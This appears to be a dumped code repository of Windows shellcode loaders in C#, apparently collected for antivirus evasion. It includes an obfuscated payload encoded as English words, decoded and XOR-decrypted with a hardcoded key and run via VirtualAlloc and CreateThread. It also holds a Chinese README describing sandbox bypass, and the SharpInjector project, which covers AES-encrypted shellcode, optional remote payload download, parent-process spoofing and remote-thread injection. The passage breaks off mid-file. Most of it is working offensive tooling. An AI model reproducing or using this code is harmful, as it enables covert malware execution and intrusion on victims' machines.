deletions knives stalls armory cuff properties expenditures sum airfield reams addresses ohms friday count entries prefix welds knives animals publication count properties feeders offering pools knives yaws auditor bails armory scenes catch centimeter airfield stalls slice merchant gyros wave principal expiration animals lifetimes subordinates settings halves pools speeders defeats share analyses resolution prefixes expenditures scenes strings hazard military boy vent bypasses researcher scenes airfields addresses answers information entries jail stones eighths mirrors facilities airfield change ditto slice lifetimes resident knives programmers grids addresses centimeter mules spots scenes airfields sprayer yaws telephone pen jail stones merchant formation centimeter airfield result defections mules stage alkalinity berths observer drydocks sponges artillery rebounds copy spots prefix reams analyses armory publication drive copy recruits ohms clock point defections auditor military peg armory balances knives military nylon chemicals evaluations result properties desert ditto prefix change guess alkalinity radios thermals alkalinity sponges swamps yaws welds mules vacuum merchant homes cash messenger alarms anticipation occurrence anticipation apprehensions hardcopies stones shipments scope share yaws drydocks eighths desert presence airfield result deletions settings apprehensions resident principal expiration glow alarms conversions evaluations stresses berths thermals airfield book pools accumulations hardcopies chimney wave deletions surges facilities professionals certifications ornaments thermals thermals berths knives glow circumstances berths programs communications expenditures berths observer nozzle spare executions gleam thermals thermals berths halves jeopardy alarms auditor jail specialties eighths speeders thermals catch entries thermocouples boy grids gleam eighths programmers shed stage sleep messenger deductions deletions glow vent count shaft acronyms occurrence sum noises telecommunications harbor prefixes ohms pails friday hazard congress circulation answers apples change state deductions addresses stresses defeats radios knob sprayer balances presence principal prefixes executions jail noises restrictions professionals telecommunications pools grids equivalents deviation deletions cavity feeders emergency occurrence shed meters commanders equivalents equivalents reliabilities speeders thermocouples radios strip knives deductions reams chimney suggestions outfit defect share nose defect addresses pull default truths knob fares pools prefix acronyms technician change sprayer artillery evaluations commanders subtotal knob sprayer telecommunications answers mirrors inspection pull specialties speeders answers change mirrors artillery share artillery thermocouples sponges buzzes settings shortages loans subtotal cash hoofs chock builders professionals fares hoofs ounce resolution answers answers builders chief professionals loans default cash truths chock builders others defect radios ounce shed lifetimes specialties polish ounce similarity lifetimes radios pools sponges analyses speeders sprayer spots chock updates glances defeat change knob welds catch thermals harbor eliminator boy auditor homes gyros gyroscope stones programmers principal adherence fans drive subordinates participation cash stones strings defect entries eliminator nozzle harness photograph drive telecommunications twist centimeter surplus result book subtotal resident slopes professionals spokes navy recruits participation noises share voices thermocouples alkalinity addresses boy glances apprehensions share congress scope entries definitions shortages damages intervals differences sleep gyros balances ditto vent routine builders technician hardcopies slice entries slice meters feeders stalls guess researcher meters tents scope speeders change pull gleam crusts adhesives subordinates hardcopies magazine auxiliaries offering balances circulation chock photograph military resolution scratch labors knives conversions rate resolution sets bails addresses slopes eighths cavity fares updates hardcopies shaft routine company puffs defeat eighths polish inspection technician odors animals slopes subordinates labors participation expiration point communications shaft anticipation artillery outfit congress round hills buzzes voices spans programmers swamps shaft hardcopies speeders congress shipments resident chock crusts footing shortage budget radios jeopardy occurrence puffs defeats sum alarms gyroscope budget clock scenes fares merchant sets halves conversions comment reams wave centimeter surges transmitter thermocouples book ounce eighths presence certifications sets comment airfields navy race communications strings observer ticket seeds properties budget cabinet mules centimeter twist specialties fares surplus settings centimeter settings cabinet mirrors ways meters twist lifetimes voices carpet stage auditor cathode hardcopies shipments suggestions copy offering auditor bails jeopardy participation auditor military properties fasteners nylon apples drydocks entries noises suggestions copy carpet berths adhesives drydocks entries publication vacuum scenes thermals berths observer knives sessions ohms presence berths shaft principal sum airfield footing buzzes spots properties spare nozzle knives military entry chemicals bypasses desert scenes peg observer thermocouples entries subordinates settings anticipation weeks prefix apples chief student stones sessions differences odors hardcopies stones cathode chimney certifications lamps adherence sleep analyses slopes armory sod friday point plating resident technician telecommunication reams suggestions ohms occurrence strings thermals berths observer drydocks scope facilities peg facilities jail principal expiration truths mirrors truths alloy lifetimes ounce subtotal cash hoofs knob artillery fasteners lifetimes thermals animals drydocks ammonia share\";\r\n string s = \"evaluations shed fasteners lifetimes share ounce acronyms analyses speeders pull defeats resolution glances inspection strip telephone telecommunications formation loans technician updates nose scratch entrances crusts answers harbor similarity specialties alloy prefix sod vent conversions sponges airfield chemicals circulation addresses hardcopies seeds sets knives hazard noises publication animals suggestions expenditures thermals homes reams ohms strings catch scope balances yaws welds buzzes centimeter participation defect polish defeat pools prefixes adherence knob routine chimney cash commanders thermocouples builders information mirrors chock fans default programmers messenger monolith change subtotal radios fares truths hoofs sprayer artillery drive berths spots alkalinity observer others professionals outfit accumulations entries armory count reliabilities drydocks subordinates friday mules restrictions scenes copy adhesives company shortages settings occurrence properties eighths slice gyros science chief state spans sleep nozzle executions vacuum recruits stage carpet halves offering round boy auditor glow comment gyroscope presence alarms pails entry voices expiration deductions puffs principal cabinet meters equivalents grids surplus circumstances guess nylon cathode intervals ornaments facilities shipments defections feeders sum twist telecommunication deletions programs auxiliaries plating bypasses cuff spare anticipation ditto experiences communications labors race ways transmitter researcher magazine deviation pen weeks wave differences jail jeopardy hills bails ammonia sessions photograph gleam shaft book merchant peg cavity airfields harness ticket apples result surges stalls eliminator military honor odors stones desert swamps rate certifications spokes clock definitions slopes emergency lamps point resident shortage apprehensions navy budget rebounds congress footing stresses tents damages student\";\r\n char[] raw = { (char)0, (char)1, (char)2, (char)3, (char)4, (char)5, (char)6, (char)7, (char)8, (char)9, (char)10, (char)11, (char)12, (char)14, (char)15, (char)16, (char)17, (char)18, (char)19, (char)20, (char)21, (char)22, (char)23, (char)24, (char)25, (char)26, (char)27, (char)28, (char)29, (char)31, (char)32, (char)33, (char)34, (char)35, (char)36, (char)37, (char)38, (char)39, (char)40, (char)41, (char)42, (char)43, (char)44, (char)45, (char)46, (char)47, (char)48, (char)49, (char)50, (char)51, (char)52, (char)53, (char)54, (char)55, (char)56, (char)57, (char)58, (char)59, (char)60, (char)61, (char)62, (char)63, (char)64, (char)65, (char)67, (char)68, (char)69, (char)70, (char)71, (char)72, (char)73, (char)74, (char)75, (char)77, (char)78, (char)79, (char)80, (char)82, (char)83, (char)84, (char)85, (char)86, (char)87, (char)88, (char)89, (char)90, (char)91, (char)92, (char)93, (char)94, (char)95, (char)96, (char)97, (char)98, (char)99, (char)100, (char)101, (char)102, (char)103, (char)104, (char)105, (char)106, (char)107, (char)108, (char)109, (char)110, (char)111, (char)112, (char)113, (char)114, (char)115, (char)116, (char)118, (char)119, (char)120, (char)121, (char)122, (char)123, (char)124, (char)125, (char)126, (char)127, (char)130, (char)132, (char)133, (char)134, (char)135, (char)136, (char)137, (char)138, (char)139, (char)140, (char)141, (char)142, (char)143, (char)145, (char)146, (char)147, (char)148, (char)149, (char)150, (char)151, (char)152, (char)154, (char)155, (char)156, (char)157, (char)158, (char)160, (char)161, (char)162, (char)164, (char)165, (char)166, (char)167, (char)168, (char)169, (char)170, (char)172, (char)173, (char)174, (char)175, (char)176, (char)177, (char)178, (char)179, (char)180, (char)181, (char)182, (char)183, (char)184, (char)185, (char)186, (char)187, (char)188, (char)189, (char)190, (char)191, (char)192, (char)193, (char)194, (char)195, (char)197, (char)198, (char)201, (char)202, (char)204, (char)205, (char)206, (char)207, (char)208, (char)209, (char)210, (char)211, (char)212, (char)213, (char)214, (char)215, (char)216, (char)217, (char)218, (char)219, (char)220, (char)221, (char)222, (char)224, (char)225, (char)226, (char)227, (char)228, (char)229, (char)230, (char)231, (char)232, (char)233, (char)234, (char)235, (char)236, (char)237, (char)238, (char)239, (char)240, (char)241, (char)242, (char)243, (char)244, (char)245, (char)246, (char)247, (char)248, (char)249, (char)250, (char)251, (char)253, (char)254, (char)255 };\r\n string[] sArray = s.Split(' ');\r\n string[] pArray = p.Split(' ');\r\n\r\n\r\n char[] ret_char = new char[pArray.Length];\r\n\r\n\r\n int index = 0;\r\n for (int i = 0; i < pArray.Length; ++i)\r\n {\r\n for (int j = 0; j < sArray.Length; ++j)\r\n {\r\n if (pArray[i] == sArray[j])\r\n {\r\n ret_char[index] = raw[j];\r\n index++;\r\n }\r\n }\r\n }\r\n byte[] encryptedShellcode = new byte[ret_char.Length];\r\n\r\n for (int k = 0; k < ret_char.Length; k++) {\r\n\r\n encryptedShellcode[k] = (byte)ret_char[k];\r\n\r\n }\r\n\r\n\r\n\r\n string key = \"admin123\";\r\n byte[] shellcode = null;\r\n shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));\r\n\r\n UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);\r\n IntPtr hThread = IntPtr.Zero;\r\n UInt32 threadId = 0;\r\n IntPtr pinfo = IntPtr.Zero;\r\n\r\n // Invoke the shellcode\r\n hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);\r\n WaitForSingleObject(hThread, 0xFFFFFFFF);\r\n\r\n return;\r\n }\r\n\r\n private static UInt32 MEM_COMMIT = 0x1000;\r\n private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\r\n\r\n // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject\r\n [DllImport(\"kernel32\")]\r\n private static extern UInt32 VirtualAlloc(\r\n UInt32 lpStartAddr,\r\n UInt32 size,\r\n UInt32 flAllocationType,\r\n UInt32 flProtect\r\n );\r\n\r\n [DllImport(\"kernel32\")]\r\n private static extern IntPtr CreateThread(\r\n UInt32 lpThreadAttributes,\r\n UInt32 dwStackSize,\r\n UInt32 lpStartAddress,\r\n IntPtr param,\r\n UInt32 dwCreationFlags,\r\n ref UInt32 lpThreadId\r\n );\r\n\r\n [DllImport(\"kernel32\")]\r\n private static extern UInt32 WaitForSingleObject(\r\n IntPtr hHandle,\r\n UInt32 dwMilliseconds\r\n );\r\n }\r\n}\r\n" }, { "path": "demo2/shellcode_execut3/shellcode_execut3/Properties/AssemblyInfo.cs", "content": "using System.Reflection;\r\nusing System.Runtime.CompilerServices;\r\nusing System.Runtime.InteropServices;\r\n\r\n// 有关程序集的一般信息由以下\r\n// 控制。更改这些特性值可修改\r\n// 与程序集关联的信息。\r\n[assembly: AssemblyTitle(\"shellcode_execut3\")]\r\n[assembly: AssemblyDescription(\"\")]\r\n[assembly: AssemblyConfiguration(\"\")]\r\n[assembly: AssemblyCompany(\"\")]\r\n[assembly: AssemblyProduct(\"shellcode_execut3\")]\r\n[assembly: AssemblyCopyright(\"Copyright © 2022\")]\r\n[assembly: AssemblyTrademark(\"\")]\r\n[assembly: AssemblyCulture(\"\")]\r\n\r\n// 将 ComVisible 设置为 false 会使此程序集中的类型\r\n//对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型\r\n//请将此类型的 ComVisible 特性设置为 true。\r\n[assembly: ComVisible(false)]\r\n\r\n// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID\r\n[assembly: Guid(\"adef6000-a190-4737-9a02-b236d56c86ac\")]\r\n\r\n// 程序集的版本信息由下列四个值组成: \r\n//\r\n// 主版本\r\n// 次版本\r\n// 生成号\r\n// 修订号\r\n//\r\n//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值\r\n//通过使用 \"*\",如下所示:\r\n// [assembly: AssemblyVersion(\"1.0.*\")]\r\n[assembly: AssemblyVersion(\"1.0.0.0\")]\r\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\r\n" }, { "path": "demo2/shellcode_execut3/shellcode_execut3/shellcode_execut3.csproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n AnyCPU\r\n {ADEF6000-A190-4737-9A02-B236D56C86AC}\r\n Exe\r\n shellcode_execut3\r\n shellcode_execut3\r\n v4.7.2\r\n 512\r\n true\r\n true\r\n \r\n \r\n AnyCPU\r\n true\r\n full\r\n false\r\n bin\\Debug\\\r\n DEBUG;TRACE\r\n prompt\r\n 4\r\n \r\n \r\n AnyCPU\r\n pdbonly\r\n true\r\n bin\\Release\\\r\n TRACE\r\n prompt\r\n 4\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "demo2/shellcode_execut3/shellcode_execut3.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.32519.379\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}\") = \"shellcode_execut3\", \"shellcode_execut3\\shellcode_execut3.csproj\", \"{ADEF6000-A190-4737-9A02-B236D56C86AC}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|Any CPU = Debug|Any CPU\r\n\t\tRelease|Any CPU = Release|Any CPU\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Debug|Any CPU.Build.0 = Debug|Any CPU\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Release|Any CPU.ActiveCfg = Release|Any CPU\r\n\t\t{ADEF6000-A190-4737-9A02-B236D56C86AC}.Release|Any CPU.Build.0 = Release|Any CPU\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {3CAC8601-1FD3-4480-A6AB-9E809AD7890B}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "demo3/README.md", "content": "使用静态字符串加密,异或加密,沙箱绕过,EtwpCreateEtwThread上线的技术。\r\n\r\n在SharpInjector的基础上,增加了shellcode的混淆。" }, { "path": "demo3/SharpInjector-master/.gitignore", "content": "*/Debug/*\n*/Release/*\n*/x64/*\n*/bin/*\n*/obj/*\n.vs/*\n*.user\n" }, { "path": "demo3/SharpInjector-master/README.md", "content": "# SharpInjector\nProject now has a 2nd branch, DInvoke, that implements Reprobate for D/Invoke functionality - 1/15/2022\n\n## Objectives\n* Utilize encrypted shellcode\n* Option to include the shellcode within the executable or download shellcode from URL\n* Ability to quickly switch which Windows API call is used for execution\n* Ability to spawn a specifed process (default: iexplore.exe) for shellcode to be injected into (for remote injection methods)\n* Ability to spoof the parent process (default: explorer.exe) of target process that will be injected into (for remote injection methods)\n\n## Overview \nThis solution has two projects: ScEncryptor and SharpInjector. The ScEncryptor project will allow you to encrypt a `.bin` file containing your shellcode. The SharpInjector project will be compiled with the resulting encrypted shellcode and inject it into memory. The shellcode the project comes with simply opens calc.\n\n## Usage\n1. Set the encryption key in ScEncryptor\\Program.cs (the key must be 16/24/32 bytes)\n2. Build the ScEncryptor project\n3. Use the resulting executable to encrypt your shellcode: `ScEncryptor.exe C:\\Temp\\shellcode.bin` (The encrypted shellcode will be automatically inserted in SharpInjector\\Shellycode.cs)\n4. Optional: set `EncSc = \"\"` within SharpInjector\\Shellycode.cs and instead host the shellcode string on the web. Set the `ShellcodeUrl` variable in SharpInjector\\Program.cs to the URL of the `EncSc` string\n5. Set the decryption key in SharpInjector\\Program.cs\n6. Set the `exeMethod`, `ParentName`, and `ProgramPath` variables in SharpInjector\\Program.cs to desired values\n7. Build the SharpInjector project (set to x64 before building)\n\n## Execution Methods\nCurrent options for shellcode execution include the following Windows API calls:\n* CreateFiber\n* CreateRemoteThread\n* CreateRemoteThreadEx\n* CreateThread\n* EtwpCreateEtwThread\n* QueueUserAPC\n* RtlCreateUserThread\n" }, { "path": "demo3/SharpInjector-master/ScEncryptor/App.config", "content": "\n\n \n \n \n" }, { "path": "demo3/SharpInjector-master/ScEncryptor/Program.cs", "content": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\nusing System.IO;\nusing System.Security.Cryptography;\n\nnamespace ScEncryptor\n{\n class Program\n {\n static void Main(string[] args)\n {\n if (args.Length != 1)\n {\n Console.WriteLine(\"Usage: EncryptedShellcode.exe \");\n Environment.Exit(1);\n }\n\n string PayloadPath = args[0];\n byte[] Shellcode = File.ReadAllBytes(PayloadPath);\n string B64Shellcode = Convert.ToBase64String(Shellcode);\n string EncryptedShellcode = Enc(B64Shellcode);\n WriteShellcodeToFile(EncryptedShellcode);\n Console.WriteLine(\"[*] Shellcode encrypted within Shellycode.cs!\");\n Console.WriteLine(\"[*] Now build the injector project or remove encrypted shellcode and host it on the web\");\n }\n\n public static string Enc(string data)\n {\n string enc = \"\";\n string key = \"01010101010101010101010101010101\"; // CHANGE THIS TO A 16/24/32 BYTE VALUE\n\n // Check byte key length; exit if not 16, 24, or 32\n if (!(new[] {16,24,32}.Contains(Buffer.ByteLength(Encoding.UTF8.GetBytes(key)))))\n {\n Console.WriteLine(\"[!] Encryption key must be 16, 24, or 32 bytes long\");\n Environment.Exit(1);\n }\n\n byte[] iv = new byte[16];\n\n using (Aes aes = Aes.Create())\n {\n aes.Key = Encoding.UTF8.GetBytes(key);\n aes.IV = iv;\n\n ICryptoTransform encryptor = aes.CreateEncryptor(aes.Key, aes.IV);\n\n using (MemoryStream ms = new MemoryStream())\n {\n using (CryptoStream cs = new CryptoStream((Stream)ms, encryptor, CryptoStreamMode.Write))\n {\n using (StreamWriter sw = new StreamWriter((Stream)cs))\n {\n sw.Write(data);\n }\n\n byte[] arr = ms.ToArray();\n enc = Convert.ToBase64String(arr);\n }\n }\n }\n\n return enc;\n }\n\n public static void WriteShellcodeToFile(string EncryptedShellcode)\n {\n string WorkingDir = Environment.CurrentDirectory;\n string ProjectDir = Directory.GetParent(WorkingDir).Parent.FullName;\n\n string[] lines = {\n \"namespace SharpInjector\",\n \"{\",\n \"\\tclass EncryptedShellcode\",\n \"\\t{\",\n $\"\\t\\tpublic string EncSc = \\\"{EncryptedShellcode}\\\";\",\n \"\\t}\",\n \"}\"\n };\n\n File.WriteAllLines($\"{ProjectDir}\\\\..\\\\SharpInjector\\\\Shellycode.cs\", lines);\n\n }\n\n }\n}\n" }, { "path": "demo3/SharpInjector-master/ScEncryptor/Properties/AssemblyInfo.cs", "content": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Information about an assembly is controlled through the following\n// set of attributes. Change these attribute values to modify the information\n// associated with an assembly.\n[assembly: AssemblyTitle(\"ScEncryptor\")]\n[assembly: AssemblyDescription(\"\")]\n[assembly: AssemblyConfiguration(\"\")]\n[assembly: AssemblyCompany(\"\")]\n[assembly: AssemblyProduct(\"ScEncryptor\")]\n[assembly: AssemblyCopyright(\"Copyright © 2020\")]\n[assembly: AssemblyTrademark(\"\")]\n[assembly: AssemblyCulture(\"\")]\n\n// Setting ComVisible to false makes the types in this assembly not visible\n// to COM components. If you need to access a type in this assembly from\n// COM, set the ComVisible attribute to true on that type.\n[assembly: ComVisible(false)]\n\n// The following GUID is for the ID of the typelib if this project is exposed to COM\n[assembly: Guid(\"27780a45-fc10-4e68-a461-fcceaf2d1bd6\")]\n\n// Version information for an assembly consists of the following four values:\n//\n// Major Version\n// Minor Version\n// Build Number\n// Revision\n//\n// You can specify all the values or you can default the Build and Revision Numbers\n// by using the '*' as shown below:\n// [assembly: AssemblyVersion(\"1.0.*\")]\n[assembly: AssemblyVersion(\"1.0.0.0\")]\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\n" }, { "path": "demo3/SharpInjector-master/ScEncryptor/ScEncryptor.csproj", "content": "\n\n \n \n Debug\n AnyCPU\n {27780A45-FC10-4E68-A461-FCCEAF2D1BD6}\n Exe\n ScEncryptor\n ScEncryptor\n v4.7.2\n 512\n true\n true\n \n \n AnyCPU\n true\n full\n false\n bin\\Debug\\\n DEBUG;TRACE\n prompt\n 4\n \n \n AnyCPU\n pdbonly\n true\n bin\\Release\\\n TRACE\n prompt\n 4\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/App.config", "content": "\n\n \n \n \n" }, { "path": "demo3/SharpInjector-master/SharpInjector/CreateFiber.cs", "content": "using System;\nusing System.IO;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Diagnostics;\nusing System.Windows.Forms;\nusing System.Runtime.InteropServices;\nusing System.Security.Cryptography;\n\nnamespace SharpInjector\n{\n class CreateFiber\n {\n public static void ExecuteCreateFiber(byte[] Shellcode)\n {\n //1. Convert the main thread into a fiber with the ConvertThreadToFiber function\n IntPtr fiberAddr = WinAPI.ConvertThreadToFiber(IntPtr.Zero);\n\n Console.WriteLine(\"[*] Allocating shellcode in current process...\");\n //2. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write\n IntPtr address = WinAPI.VirtualAlloc(IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n\n //3.Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space\n IntPtr ShellCode_Pointer = Marshal.AllocHGlobal(Shellcode.Length);\n Marshal.Copy(Shellcode, 0, ShellCode_Pointer, Shellcode.Length);\n WinAPI.RtlCopyMemory(address, ShellCode_Pointer, Shellcode.Length);\n\n //4.Change the memory page permissions to Execute/ Read with VirtualProtect\n WinAPI.VirtualProtect(address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect);\n\n Console.WriteLine(\"[*] Calling CreateFiber...\");\n //5.Call CreateFiber on shellcode address\n IntPtr fiber = WinAPI.CreateFiber(0, address, IntPtr.Zero);\n if (fiber == IntPtr.Zero)\n {\n //clean\n Marshal.FreeHGlobal(ShellCode_Pointer);\n //return\n return;\n }\n\n //6.Call SwitchToFiber to start the fiber and execute the shellcode\n WinAPI.SwitchToFiber(fiber);\n //For some reason, switch to fiber for the main thread as well. NOT SURE ABOUT THIS\n WinAPI.SwitchToFiber(fiberAddr);\n\n //CLEAN UP AFTERWARDS.\n Marshal.FreeHGlobal(ShellCode_Pointer);\n }\n }\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThread.cs", "content": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\n\nnamespace SharpInjector\n{\n class CreateRemoteThread\n {\n public static void ExecuteCreateRemoteThread(string ParentName, string ProgramPath, byte[] Shellcode)\n {\n WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n IntPtr lpSize = IntPtr.Zero;\n\n WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n // Get handle on parent\n Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n ps.nLength = Marshal.SizeOf(ps);\n ts.nLength = Marshal.SizeOf(ts);\n\n IntPtr bytesWritten = IntPtr.Zero;\n\n\n WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n bool success = WinAPI.CreateProcess(\n ProgramPath,\n null,\n ref ps,\n ref ts,\n true,\n WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n IntPtr.Zero,\n null,\n ref StartupInfoEx,\n out ProcessInfo);\n\n if (ProcessInfo.hProcess == IntPtr.Zero)\n {\n return;\n }\n\n Console.WriteLine($\"[*] Spwaned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n Console.WriteLine(\"[*] Allocating shellcode...\");\n IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n if (Address == IntPtr.Zero)\n {\n WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n return;\n }\n\n if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n Console.WriteLine(\"[*] Calling CreateRemoteThread...\");\n IntPtr hThread = WinAPI.CreateRemoteThread(ProcessInfo.hProcess, IntPtr.Zero, 0, Address, IntPtr.Zero, 0, IntPtr.Zero);\n if (hThread == IntPtr.Zero)\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n Console.WriteLine(\"[*] Shellcode executed\");\n }\n }\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/CreateRemoteThreadEx.cs", "content": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\n\nnamespace SharpInjector\n{\n class CreateRemoteThreadEx\n {\n public static void ExecuteCreateRemoteThreadEx(string ParentName, string ProgramPath, byte[] Shellcode)\n {\n WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n IntPtr lpSize = IntPtr.Zero;\n\n WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n // Get handle on parent\n Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n ps.nLength = Marshal.SizeOf(ps);\n ts.nLength = Marshal.SizeOf(ts);\n\n IntPtr bytesWritten = IntPtr.Zero;\n\n\n WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n bool success = WinAPI.CreateProcess(\n ProgramPath,\n null,\n ref ps,\n ref ts,\n true,\n WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n IntPtr.Zero,\n null,\n ref StartupInfoEx,\n out ProcessInfo);\n\n if (ProcessInfo.hProcess == IntPtr.Zero)\n {\n return;\n }\n\n Console.WriteLine($\"[*] Spwaned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n Console.WriteLine(\"[*] Allocating shellcode...\");\n IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n if (Address == IntPtr.Zero)\n {\n WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n return;\n }\n\n if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n Console.WriteLine(\"[*] Calling CreateRemoteThreadEx...\");\n 